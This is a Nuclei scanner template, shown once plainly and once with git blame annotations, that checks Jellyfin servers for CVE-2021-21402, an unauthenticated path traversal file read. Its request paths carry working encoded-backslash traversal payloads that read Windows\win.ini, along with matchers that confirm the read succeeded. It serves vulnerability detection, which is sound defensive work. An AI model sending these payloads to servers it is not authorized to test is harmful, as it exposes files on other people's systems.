nuclei-templates/cves/2021/CVE-2021-21402.yaml

id: CVE-2021-21402

info:
  name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read
  author: dwisiswant0
  severity: medium
  description: |
    Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when
    Windows is used as the host OS. Servers that are exposed to the public Internet are
    potentially at risk. This is fixed in version 10.7.1.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-21402
    cwe-id: CWE-22
  tags: cve,cve2021,jellyfin,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
      - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Content-Type: application/octet-stream"
        part: header
      - type: regex
        regex:
          - "\\[(font|extension|file)s\\]"
        part: body
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00			`id: CVE-2021-21402`

			`info:`
Spelling 2021-04-06 10:38:03 +00:00			`name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read`
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00			`author: dwisiswant0`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: medium`
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00			`description: \|`
			`Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when`
			`Windows is used as the host OS. Servers that are exposed to the public Internet are`
			`potentially at risk. This is fixed in version 10.7.1.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.5`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2021-21402`
			`cwe-id: CWE-22`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2021,jellyfin,lfi`
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update vulnerable paths 2021-04-02 00:11:37 +00:00			`- "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"`
			`- "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"`
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
Add header matcher 2021-04-02 00:17:18 +00:00			`- type: word`
			`words:`
			`- "Content-Type: application/octet-stream"`
			`part: header`
:fire: Add CVE-2021-21402 2021-04-01 22:16:53 +00:00			`- type: regex`
			`regex:`
			`- "\\[(font\|extension\|file)s\\]"`
			`part: body`